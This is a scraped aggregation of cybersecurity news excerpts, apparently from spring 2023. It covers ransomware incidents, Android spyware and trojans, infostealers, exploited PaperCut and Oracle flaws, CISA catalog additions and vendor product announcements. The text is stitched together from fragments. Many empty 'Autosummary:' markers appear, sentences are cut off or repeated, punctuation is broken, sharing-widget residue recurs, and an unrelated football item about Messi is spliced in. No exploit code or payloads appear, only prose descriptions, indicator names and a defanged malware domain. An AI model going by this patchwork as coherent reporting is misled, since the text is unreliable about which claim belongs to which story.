Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Fleckpe malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Accessing "this->view" variable through the "current_screen" function (Patchstack) The developer fixed the flaw in version 6.1.6 by implementing a new function named "esc_attr" that properly sanitizes the output value of the admin_body_class hook, hence, preventing the XSS. "AutoCrypt KEY enables OEMs and suppliers to manage all types of cryptographic keys used for the components of connected and electric vehicles. Modern vehicles function through communications, including internal communications between ECUs and application processors, and external connections with nearby vehicles, roadside infrastructure, mobile devices, and charging stations. To ensure that all transmitted data are safely encrypted and all connected components can be securely verified, the use of cryptographic keys is essential in establishing trust … More
The post AutoCrypt KEY provides the key management features needed for automotive production appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "Autosummary:
"All the bots that successfully pass those steps will be selected by botnet operators and considered as "new candidates" for banking fraud operations moving forward to the next stage, where Ramnit, one of the most advanced banking trojans, will be installed," the researchers said. "Autosummary:
"Autosummary:
Malicious app interface (Check Point) After capturing the victims" account credentials and credit card details, the apps display a "system is busy" message for 10 minutes, likely to make the process appear realistic while the operators act in the background to intercept 2FA codes and leverage the stolen data. "Autosummary:
"Autosummary:
Constellation Software acquires, manages, and builds software businesses through six operating groups: Volaris, Harris, Jonas, Vela Software, Perseus Group, and Topicus. "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @serghei, @demonslay335, @billtoulas, @Ionut_Ilascu, @fwosar, @LawrenceAbrams, @BleepinComputer, @Seifreed, @AlvieriD, @WithSecure, @PogoWasRight, @pcrisk, @siri_urz, @Unit42_Intel, and @BrettCallow. The ALPHV ransomware operation, aka BlackCat, has published screenshots of internal emails and video conferences stolen from Western Digital, indicating they likely had continued access to the company"s systems even as the company responded to the breach. "Categories: News Tags: Russia Tags: Ukraine Tags: censorship Tags: press Tags: freedom Tags: restrictions Tags: evade Tags: counter-strike: global offensive Tags: counter strike GO Tags: steam Tags: workshop Tags: map Tags: de_vonya We take a look at one newspaper"s innovative way of bypassing Russian media restrictions. |
The post Newspaper evades Russian censors, hides news in Counter-Strike map appeared first on Malwarebytes Labs.
"Autosummary:
This room contains independent journalism that is forbidden in Russia A sign on one wall states “Russian strikes on civilian targets 2022-2023,” above a map highlighting strike locations, next to several photographs of the damage inflicted.The plan: Hide a secret room underneath a map, which players can stumble upon and see facts, figures, and photographs of what’s been going on. Flashing lights indicate the presence of the room Inside the room The room itself is made up of several areas of information, with a main table located in the middle. If you click on the map to open its page, and then hit the green “Subscribe” button, the map will be available next time you load up the game. "The success of ChatGPT, a text-generation chatbot, has sparked widespread interest in generative AI among millions of people worldwide. According to Jumio’s research, 67% of consumers globally are aware of generative AI technologies, and in certain markets, such as Singapore, 45% have utilized an application that employs such technologies. In this Help Net Security video, Leonid Belkind, CTO at Torq, talks about how AI will impact the cybersecurity industry in the next few years. Are … More
The post How AI is reshaping the cybersecurity landscape appeared first on Help Net Security.
"Autosummary:
"Amazon Inspector is designed to manage vulnerabilities by continuously scanning your AWS workloads for software vulnerabilities and unintended network exposure across your entire organization. Upon activation, Amazon Inspector automatically detects all your Amazon Elastic Compute Cloud (EC2) instances, container images in Amazon Elastic Container Registry (ECR), and AWS Lambda functions on a large scale. It then continuously monitors them for known vulnerabilities, providing you with a unified view of vulnerabilities across your compute environments. It … More
The post Amazon Inspector allows search of its vulnerability intelligence database appeared first on Help Net Security.
"Autosummary:
"Intruder has launched its continuous attack surface monitoring capabilities. The company’s new premium plan offering takes vulnerability management to the next level with continuous coverage, increasing visibility and transparency of external attack surfaces. On average, 65 new vulnerabilities are discovered every day. Businesses of all sizes need visibility of a constantly evolving external attack surface, and to continually manage their exposure to avoid being breached. Intruder’s continuous network scanning includes adaptive attack surface scans, which … More
The post Intruder launches continuous attack surface monitoring for SMBs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Besides using social media for propagating the ChatGPT-themed malicious URLs, the malware is hosted on a variety of legitimate services such as Buy Me a Coffee, Discord, Dropbox, Google Drive, iCloud, MediaFire, Mega, Microsoft OneDrive, and Trello. "The City of Dallas, Texas, was hit by a ransomware attack that forced it to shut down some of its IT systems. The IT systems at the City of Dallas, Texas, have been targeted by a ransomware attack. To prevent the threat from spreading within the network, the City has shut down the impacted IT […]
The post City of Dallas shut down IT services after ransomware attack appeared first on Security Affairs.
"Autosummary:
The ransomware encrypts the network shares, that are found on the local network and the local drives, with the AES algorithm In March, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations, tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family.“Subsequently, the City has confirmed that a number of servers have been compromised with ransomware, impacting several functional areas, including the Dallas Police Department Website,” “The City team, along with its vendors, are actively working to isolate the ransomware to prevent its spread, to remove the ransomware from infected servers, and to restore any services currently impacted. "Autosummary:
However, the incident took a nasty turn on May 1st, 2023, with the Avos (aka AvosLocker) threat actors still having access to the University"s RamAlert system, an emergency alert system used to warn students and staff via email and text of campus emergencies or threats. "Autosummary:
"The City of Dallas, Texas, has suffered a ransomware attack that resulted in disruption of several of its services. What do we know so far? “Wednesday morning, the City’s security monitoring tools notified our Security Operations Center (SOC) that a likely ransomware attack had been launched within our environment,” the City’s public statement revealed. “Subsequently, the City has confirmed that a number of servers have been compromised with ransomware, impacting several functional areas, including the … More
The post City of Dallas hit by ransomware appeared first on Help Net Security.
"Autosummary:
“Rather than selling Royal as a ransomware-as-a-service (RaaS), [the group] purchases direct access to corporate networks from underground Initial Access Brokers (IABs) and manages the attack campaigns internally,” BlackBerry researchers say, adding that the group is also known for engaging in double extortion tactics. "Autosummary:
But the Massachusetts-based threat Intelligence firm said it discovered a new method that abuses the print management software"s "User/Group Sync" feature, which makes it possible to synchronize user and group information from Active Directory, LDAP, or a custom source. "Autosummary:
Meanwhile, as malicious software like "Info Stealer" gains more traction among cybercriminals, the dark web is still full of stories, tactics, and tips for using traditional cybercrime tools like ransomware, Trojan, Spyware, adware, and more. For example, in today"s world of hybrid and remote working environments, an organization"s security tools are not able to secure devices like laptops, phones and tablets used outside of a business" security boundaries. Why the dark web is a threat to your organization For cybersecurity and IT teams, one of the most threatening aspects of the dark web is that you simply don"t know what you don"t know. "Facebook discovered a new information-stealing malware, dubbed ‘NodeStealer,’ that is being distributed on Meta. NodeStealer is a new information-stealing malware distributed on Meta that allows stealing browser cookies to hijack accounts on multiple platforms, including Facebook, Gmail, and Outlook. The malware was first spotted in late January 2023 while targeting the browsers of Windows systems. It […]
The post Facebook warns of a new information-stealing malware dubbed NodeStealer appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Facebook) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “As part of this effort, we submitted takedown requests to third-party registrars, hosting providers, and application services such as Namecheap, which were targeted by these threat actors to facilitate distribution and malicious operations.” reads the post published by Facebook. "Autosummary:
"Autosummary:
Kaspersky discovered 11 Fleckpe trojan apps impersonating image editors, photo libraries, premium wallpapers, and more on Google Play, distributed under the following names: com.impressionism.prozs.app com.picture.pictureframe com.beauty.slimming.pro com.beauty.camera.plus.photoeditor com.microclip.vodeoeditor com.gif.camera.editor com.apps.camera.photos com.toolbox.photoeditor com.hd.h4ks.wallpaper com.draw.graffiti com.urox.opixe.nightcamreapro "All of the apps had been removed from the marketplace by the time our report was published, but the malicious actors might have deployed other, as yet undiscovered, apps, so the real number of installations could be higher." "VulnCheck researchers devised a new exploit for a recently disclosed critical flaw in PaperCut servers that bypasses all current detections. Cybersecurity researchers from VulnCheck have developed a new exploit for the recently disclosed critical flaw in PaperCut servers, tracked as CVE-2023-27350 (CVSS score: 9.8), that bypasses all current detections. The CVE-2023-27350 flaw is a PaperCut MF/NG Improper Access […]
The post Experts devised a new exploit for the PaperCut flaw that can bypass all current detection appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. "Autosummary:
The features of Malwarebytes Premium include the following: Advanced antivirus, anti-malware, anti-spyware, and more Phishing and malicious link protection Ransomware and zero-day exploit protection Brute Force Protection Uninstall Protection Remove not only malware but adware and potentially unwanted programs as well. "Autosummary:
"Veza has unveiled Veza for SaaS Apps, a solution to deliver access security and governance across SaaS applications, including Salesforce, JIRA, Coupa, Netsuite, GitHub, Gitlab, Slack, and Bitbucket. The solution allows customers to automate access reviews, find and fix privilege access violations, trim privilege sprawl, and prevent SaaS misconfigurations. With this solution, Veza secures the attack surface associated with SaaS apps while enabling continuous compliance with frameworks like Sarbanes-Oxley, ISO 27001, SOC 2, and GDPR. … More
The post Veza for SaaS Apps secures sensitive data against breaches, ransomware, and insider threats appeared first on Help Net Security.
"Autosummary:
"T-Mobile has revealed a second data breach that occurred in 2023, which reportedly exposed customer data and account PINs, leaving many T-Mobile users vulnerable to potential fraud and identity theft. What happened? The attack started on February 24 and lasted until March 30, and affected 836 customers. “In March 2023, the measures we have in place to alert us to unauthorized activity worked as designed and we were able to determine that a bad actor … More
The post T-Mobile suffers second data breach this year appeared first on Help Net Security.
"Autosummary:
“The information obtained for each customer varied, but may have included full name, contact information, account number and associated phone numbers, T-Mobile account PIN, social security number, government ID, date of birth, balance due, internal codes that T-Mobile uses to service customer accounts (for example, rate plan and feature codes), and the number of lines,” the company added in the letter. "Autosummary:
"Autosummary:
"Further, we implemented additional security measures, including limiting ongoing access to verified users, removing all of our data from the service, and continuing ongoing measures to reduce data exposure until an alternative file transfer solution is identified and implemented. "Five years ago, security researcher Fernandez Ezequiel discovered a vulnerability (CVE-2018-9995) in many digital video recorder (DVR) brands and released a tool for exploiting it. The vulnerability is still being exploited in the wild, FortiGuard Labs warns: the company’s intrusion prevention systems have registered 50,000+ unique exploitation attempts in the past month. About CVE-2018-9995 CVE-2018-9995 is an authentication bypass vulnerability that can be triggered with a simple exploit sent via a maliciously crafted HTTP cookie … More
The post Attackers are trying to exploit old DVR vulnerabilities (CVE-2018-9995, CVE-2016-20016) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. "Threat actors are using the promise of generative AI like ChatGPT to deliver malware, Facebook parent Meta warned. Threat actors are taking advantage of the huge interest in generative AI like ChatGPT to trick victims into installing malware, Meta warns. The hackers attempt to trick victims into installing malicious apps and browser extensions on their […]
The post Hackers are taking advantage of the interest in generative AI to install Malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, generative AI) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Keysight Technologies has launched a new cybersecurity partnership program for managed security service providers (MSSP) to improve the security posture of organizations using the breach and attack simulation (BAS) capabilities of Keysight Threat Simulator. Cyberattacks are on the rise and so is the cost of a data breach. IBM and the Ponemon Institute estimate that the cost of data breaches has reached an all-time high globally, averaging $4.35 million in 2022 per incident. With the … More
The post Keysight launches cybersecurity partnership program for MSSPs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The City team, along with its vendors, are actively working to isolate the ransomware to prevent its spread, to remove the ransomware from infected servers, and to restore any services currently impacted.Subsequently, the City has confirmed that a number of servers have been compromised with ransomware, impacting several functional areas, including the Dallas Police Department Website," explained a media statement from the City of Dallas. "Autosummary:
"Autosummary:
Establishing persistence (Facebook) The malware"s primary goal is to steal cookies and account credentials for Facebook, Gmail, and Outlook, stored in Chromium-based web browsers like Google Chrome, Microsoft Edge, Brave, Opera, etc. "Categories: Exploits and vulnerabilities Categories: News Tags: Oracle Tags: WebLogic Tags: CVE-2023-21839 Tags: CVE-2023-1389 Tags: CVE-2021-45046 Tags: CISA Tags: reverse shell An easy to exploit vulnerability in Oracle WebLogic Server has been added to the CISA list of things you really, really need to patch. |
The post Oracle WebLogic Server vulnerability added to CISA list as “known to be exploited” appeared first on Malwarebytes Labs.
"Autosummary:
Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen() , allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.Specifically, the country parameter of the write operation was not sanitized before being used in a call to , allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Geoff White – @geoffwhite247 Episode links: Sponsored by: Bitwarden – Password security you can trust. "Autosummary:
His reluctance to commit to a new deal in recent months has frustrated PSG"s Qatari owners, who believe Messi"s lack of response was a clear message he didn"t want to stay The 35-year-old was suspended by PSG for two weeks on Tuesday after travelling to Saudi Arabia without the club"s permission. "In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. He delves into the far-reaching impact of cyberattacks on manufacturing companies, their supply chains, and the global economy. Additionally, Beato discusses the unique nature of cyber threats faced by the manufacturing industry and the challenges of implementing effective cybersecurity measures. How has … More
The post Why the manufacturing sector needs stronger cyber defenses appeared first on Help Net Security.
"Autosummary:
It contributes to global circular economies, such as consumer goods, electronics, automotive, energy, pharma, food and beverage, heavy industry and oil and gas.In this Help Net Security interview, Filipe Beato, Lead, Centre for Cybersecurity, World Economic Forum, shares his expertise on the correlation between the digitization of the manufacturing sector and the rise in cyberattacks. Early this year, in January 2023, two new EU directives also entered into force: the NIS2, which replaced the previous directive on security of network and information systems, and the Critical Entities Resilience (CER) directive which repealed a 2008 directive on European critical infrastructure. "Autosummary:
Archer AX-21 Command Injection Vulnerability (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability CVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability CVE-2023-21839 (CVSS score: 7.5) - "The previously undetected LOBSHOT malware is distributed using Google ads and gives operators VNC access to Windows devices. Researchers from Elastic Security Labs spotted a new remote access trojan dubbed LOBSHOT was being distributed through Google Ads. Threat actors are using an elaborate scheme of fake websites through Google Ads to spread their malware, the […]
The post New Lobshot hVNC malware spreads via Google ads appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, LOBSHOT malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On While VirusTotal gives the resulting MSI 0 detections, it is indeed sketchy, attempting to download a DLL from download-cdn[.]com, which would get executed with SYSTEM privileges.https://t.co/zg5e20IucZ pic.twitter.com/wPeUqKeQ8s — Will Dormann (@wdormann) January 23, 2023 Elastic experts observed over 500 unique LOBSHOT samples since July 2022, they are both 32-bit DLLs or 32-bit executables. "Autosummary:
Contained in the published data were: names and birthdates of children with special needs, details of their home lives and any disorders, results of intelligence tests, and details of what medication they might be taking. "Onfido announced that its Real Identity Platform services are now available for Salesforce Financial Services Cloud customers. Financial Services Cloud customers now have access to a suite of Onfido’s services, including Onfido’s library of global identity verification tools, Studio, Onfido’s identity orchestration product, and Atlas AI, Onfido’s anti-bias artificial intelligence software. These tools can be integrated with Onfido’s Smart Capture Link, enabling Salesforce customers to use low-code technology to more quickly verify the identity of … More
The post Onfido unveils identity verification service for Salesforce Financial Services Cloud appeared first on Help Net Security.
"Autosummary:
"Autosummary:
According to data from eSentire, the threat actors behind GootLoader have been linked to a string of attacks targeting law firms and corporate legal departments in the U.S., Canada, the U.K., and Australia. "Autosummary:
Other bespoke malware used by the group include, but not limited to, Chinotto, BLUELIGHT, GOLDBACKDOOR, Dolphin, and, most recently, M2RAT. "US Cybersecurity and Infrastructure Security Agency (CISA) added TP-Link, Apache, and Oracle vulnerabilities to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following three new issues to its Known Exploited Vulnerabilities Catalog: CVE-2023-1389 (CVSS score: 8.8) – TP-Link Archer AX-21 Command Injection Vulnerability. The CVE-2023-1389 flaw is an unauthenticated […]
The post CISA adds TP-Link, Apache, and Oracle bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The vulnerability impacts the TBK DVR4104 and TBK DVR4216 and rebrands of these models sold under the Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR brands. "A recently patched vulnerability (CVE-2023-21932) in Oracle Opera, a property management system widely used in large hotel and resort chains, is more critical than Oracle says it is and could be easily exploited by unauthenticated remote attackers to access sensitive information, a group of researchers has warned. Oracle Opera landing page (Source: Assetnote) What’s more, these systems are often exposed to the internet and they are not hard to find. According to security researcher Kevin … More
The post Easily exploitable flaw in Oracle Opera could spell trouble for hotel chains (CVE-2023-21932) appeared first on Help Net Security.
"Autosummary:
About CVE-2023-21932 Oracle Opera, also known as Micros Opera, is a solution many companies in the hospitality industry – more specifically, those offering lodging and related services – use to manage reservations, sales, housekeeping, catering, and deliver personalized guest experiences. "Autosummary:
BouldSpy, like other Android malware families, abuses its access to Android"s accessibility services and other intrusive permissions to harvest sensitive data such as web browser history, photos, contact lists, SMS logs, keystrokes, screenshots, clipboard content, microphone audio, and video call recordings. "Autosummary:
"Autosummary:
"Specifically, the claim reward was determined by the tier of referral and reward points, hence the attacker made the following preparation: 1) creating and setting many referrals; 2) using flashloan to perform dozens of swap (the reward was updated in the postSwap function)," explained BlockSec on Twitter. "Autosummary:
"A joint operation conducted by the FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminal groups for money laundering. The Cyber Police Department together with the Main Investigative Department of the National Police, the Office of the Prosecutor General of Ukraine and in cooperation with the FBI conducted an international operation that seized […]
The post FBI and Ukrainian police seized 9 crypto exchanges used by cybercriminals appeared first on Security Affairs.
"Autosummary:
The crypto exchanges seized by law enforcement are: 24xbtc.com 100btc.pro pridechange.com 101crypta.com uxbtc.com trust-exchange.org bitcoin24.exchange paybtc.pro owl.gold Law enforcement published the following seizure banner on the seized services: “Domain names offered by organizations which were engaged in cryptocurrency conversions and provided assistance to cyber-criminals were seized, and related servers were shut down. "Bot attacks were previously seen as relatively inconsequential type of online fraud, and that mentality has persisted even as threat actors have gained the ability to cause significant damage to revenue and brand reputation, according to HUMAN. Bad bot traffic Bad bot traffic overall increased even as people spent less time online. Legitimate human traffic dropped 28% YoY, but bad bot traffic increased 102% YoY — meaning that the percentage of bad bots out of … More
The post Cybercriminals use proxies to legitimize fraudulent requests appeared first on Help Net Security.
"Autosummary:
Carding attacks rose 134% YoY, account takeover attacks rose 108% YoY, and scraping rose 107% YoY. Certain industries experienced more bot attacks than others. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
On April 20th, Twitter finally removed the legacy verified check marks from accounts worldwide that were used to demonstrate the authenticity of accounts belonging to businesses, celebrities, politicians, activists, and journalists. "Autosummary:
In response, the company shut down its cloud services for two weeks, including My Cloud, My Cloud Home, My Cloud Home Duo, My Cloud OS 5, SanDisk ibi, and SanDisk Ixpand Wireless Charger, together with linked mobile, desktop, and web apps. "Autosummary:
"Bitmarck, one of the largest IT service providers for social insurance carriers in Germany, announced yesterday that it has suffered a cyber attack. The German IT service provider Bitmarck announced on April 30 it had taken all its systems offline due to a cyberattack. The incident impacted statutory health insurance companies that have their IT operated […]
The post German IT provider Bitmarck hit by cyberattack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Bitmarck) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Iranian authorities have been spotted using the BouldSpy Android malware to spy on minorities and traffickers. Researchers at the Lookout Threat Lab have discovered a new Android surveillance spyware, dubbed BouldSpy, that was used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA). The researchers are tracking the spyware since March 2020, starting in […]
The post Iranian govt uses BouldSpy Android malware for internal surveillance operations appeared first on Security Affairs.
"Autosummary:
Below is a list of the surveillance capabilities supported by the spyware: Getting all account usernames available on the device and their associated types (such as Google, Telegram, WhatsApp and others) List of installed apps Browser history and bookmarks Live call recordings Call logs Take photos from the device cameras Contact lists Device information (IP address, SIM card information, Wi-Fi information, Android version, and device identifiers) "Russian APT group Nomadic Octopus hacked a Tajikistani carrier to spy on government officials and public service infrastructures. Russian cyber espionage group Nomadic Octopus (aka DustSquad) has hacked a Tajikistani telecoms provider to spy on 18 entities, including high-ranking government officials, telecommunication services, and public service infrastructures. The cyberspies compromised a broad range of devices, […]
The post Russian APT Nomadic Octopus hacked Tajikistani carrier appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Nomadic Octopus) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Blogger Awards 2022 – VOTE FOR YOUR WINNERS Vote for me in the sections: The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. "Autosummary:
However, these sites pushed malware instead of distributing legitimate applications, including Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT, and the Royal Ransomware. "Autosummary:
"T-Mobile disclosed the second data breach of 2023, threat actors had access to the personal information of hundreds of customers since February. T-Mobile suffered the second data breach of 2023, threat actors had access to the personal information of hundreds of customers starting in late February 2023. The security breach impacted a limited number of […]
The post T-Mobile suffered the second data breach in 2023 appeared first on Security Affairs.
"Autosummary:
"Infoblox researchers discovered a new sophisticated malware toolkit, dubbed Decoy Dog, targeting enterprise networks. While analyzing billions of DNS records, Infoblox researchers discovered a sophisticated malware toolkit, dubbed Decoy Dog, that was employed in attacks aimed at enterprise networks. Threat actors behind the malware were observed using known tricks to avoid detection such as registering a domain, […]
The post Experts spotted a new sophisticated malware toolkit called Decoy Dog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"The UK Cyber Security Councilv has launched the first phase of its certification mapping tool. It has been created to map all available cyber security certifications onto the 16 specialisms identified by the Council, with the first phase now available. The tool currently includes at least one certification per specialism, with more to be added. The Council aims to deliver a comprehensive resource that contains all options of value to each career path, and the … More
The post UK Cyber Security Council launches certification mapping tool appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Over the last two years, respondents reported a continued reliance on the least secure forms of authentication, including traditional usernames and passwords and one-time passwords (OTPs), according to Yubico. Not all MFA is equal The results are surprising considering 59% of respondents reported having a security breach within the past year – up 6% from just two years ago. Additionally, the report revealed a significant increase in MFA deployment for customers, which jumped to 57% … More
The post Phishing-resistant MFA shapes the future of authentication forms appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Major UK banks facing internet outage BleepingComputer has been able to confirm that the four major UK banks are currently experiencing disruptions related to their online banking and mobile banking systems since the early morning hours of Friday, April 28th. "Autosummary:
"Autosummary:
"Autosummary:
The flaws impact the following Illumina products: iScan Control Software: v4.0.0 iScan Control Software: v4.0.5 iSeq 100: All versions MiniSeq Control Software: v2.0 and newer MiSeq Control Software: v4.0 (RUO Mode) MiSeqDx Operating Software: v4.0.1 and newer NextSeq 500/550 Control Software: v4.0 NextSeq 550Dx Control Software: v4.0 (RUO Mode) NextSeq 550Dx Operating Software: v1.0.0 to 1.3.1 NextSeq 550Dx Operating Software: v1.3.3 and newer NextSeq 1000/2000 Control Software: v1.7 and prior NovaSeq 6000 Control Software: v1.7 and prior NovaSeq Control Software: v1.8 The vulnerabilities do not impact software versions not specified in the above list, and hence no actions need to be taken. "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @serghei, @DanielGallagher, @malwareforme, @malwrhunterteam, @FourOctets, @billtoulas, @struppigel, @LawrenceAbrams, @Ionut_Ilascu, @Seifreed, @demonslay335, @BleepinComputer, @fwosar, @jorntvdw, @PolarToffee, @uptycs, @Trellix, @MsftSecIntel, @AlvieriD, @Jon__DiMaggio, @Fortinet, and @pcrisk. "Autosummary:
However, in the latest variant, Trend Micro spotted increased functionality that steals from the following additional wallets: Armory Atomic Wallet Binance Bitcoin Blockstream Green Coinomi Delta Electrum Exodus Guarda Jaxx Liberty Ledger Live Trezor Bridge Coin98 Coinbase MetaMask Enkrypt Of particular interest, Trend Micro also reports that ViperSoftX is now checking for files associated with two password managers, namely 1Password and KeePass 2, attempting to steal data stored in their browser extensions. "OpenAI announced that access to its chatbot service ChatGPT is allowed again in Italy after the company met the demands of regulators. OpenAI restored access to ChatGPT in Italy after the company met the demands of the Italian Data Protection Authority, Garante Privacy. In early April, the Italian Data Protection Authority, c, temporarily banned ChatGPT […]
The post OpenAI reinstates ChatGPT service in Italy after meeting Garante Privacy’s demands appeared first on Security Affairs.
"Autosummary:
Below the list of measured implemented by OpenAI: – drafted and published, on its website, an information notice addressed to users and non-users, in Europe and elsewhere, describing which personal data are processed under which arrangements for training algorithms, and recalling that everyone has the right to opt-out from such processing; – expanded its privacy policy for users and made it also accessible from the sign-up page prior to registration with the service; – granted all individuals in Europe, including non-users, the right to opt-out from processing of their data for training of algorithms also by way of an online, easily accessible ad-hoc form; – introduced a welcome back page in case of reinstatement of the service in Italy containing links to the new privacy policy and the information notice on the processing of personal data for training algorithms; – introduced mechanisms to enable data subjects to obtain erasure of information that is considered inaccurate, whilst stating that it is technically impossible, as of now, to rectify inaccuracies; – clarified in the information notice for users that it would keep on processing certain personal data to enable performance of its services on a contractual basis, however it would process users’ personal data for training algorithms on the legal basis of its legitimate interest, without prejudice to users’ right to opt-out from such processing; – implemented a form to enable all European users to opt-out from the processing of their personal data and thus to filter out their chats and chat history from the data used for training algorithms; – added, in the welcome back page reserved for Italian registered users, a button for them to confirm that they are aged above 18 prior to to gaining access to the service, or else that they are aged above 13 and have obtained consent from their parents or guardians for that purpose; – included the request to specify one’s birthdate in the service sign-up page to block access by users aged below 13 and to request confirmation of the consent given by parents or guardians for users aged between 13 and 18. "Cisco is working on a patch for a bug in the Prime Collaboration Deployment solution that was reported by a member of NATO’s Cyber Security Centre (NCSC). Cisco informed its customers that it’s working on a patch for cross-site scripting (XSS) issue, tracked as CVE-2023-20060 (CVSS score 6.1), affecting its Prime Collaboration Deployment product. The vulnerability […]
The post Cisco discloses a bug in the Prime Collaboration Deployment solution appeared first on Security Affairs.
"Autosummary:
"Categories: News Categories: Ransomware Tags: PaperCut Tags: Cl0p Tags: LockBit Vulnerabilities in PaperCut printing management are being used in ransomware attacks. |
The post LockBit and Cl0p ransomware gangs actively exploiting Papercut vulnerabilities appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. In a surprising turn of events for the ransomware landscape, Cl0p emerged as the most used ransomware in March 2023, coming out of nowhere to dethrone the usual frontrunner, LockBit.This makes a vulnerability, especially one that is as easy to exploit, a virtual goldmine for ransomware peddlers, and puts a bullseye on anyone that is running an unpatched server. "Clop and LockBit ransomware affiliates are behind the recent attacks exploiting vulnerabilities in PaperCut application servers, according to Microsoft and Trend Micro researchers. The detected campaings “Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” Microsoft shared. “Lace Tempest (DEV-0950) is a Clop ransomware affiliate that has been observed … More
The post PaperCut vulnerabilities leveraged by Clop, LockBit ransomware affiliates appeared first on Help Net Security.
"Autosummary:
The detected campaings “Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” Microsoft shared. "GitHub has announced that its private vulnerability reporting feature for open source repositories is now available to all project owners. General availability The private vulnerability reporting feature provides a direct collaboration channel that allows researchers to more easily report vulnerabilities, and maintainers to easily fix them. It has been available in public beta since November 2022. “Since then, maintainers for more than 30k organizations have enabled private vulnerability reporting on more than 180k repositories, receiving … More
The post GitHub introduces private vulnerability reporting for open source repositories appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware"s leaked source code," Uptycs said in a new report published Wednesday. "Autosummary:
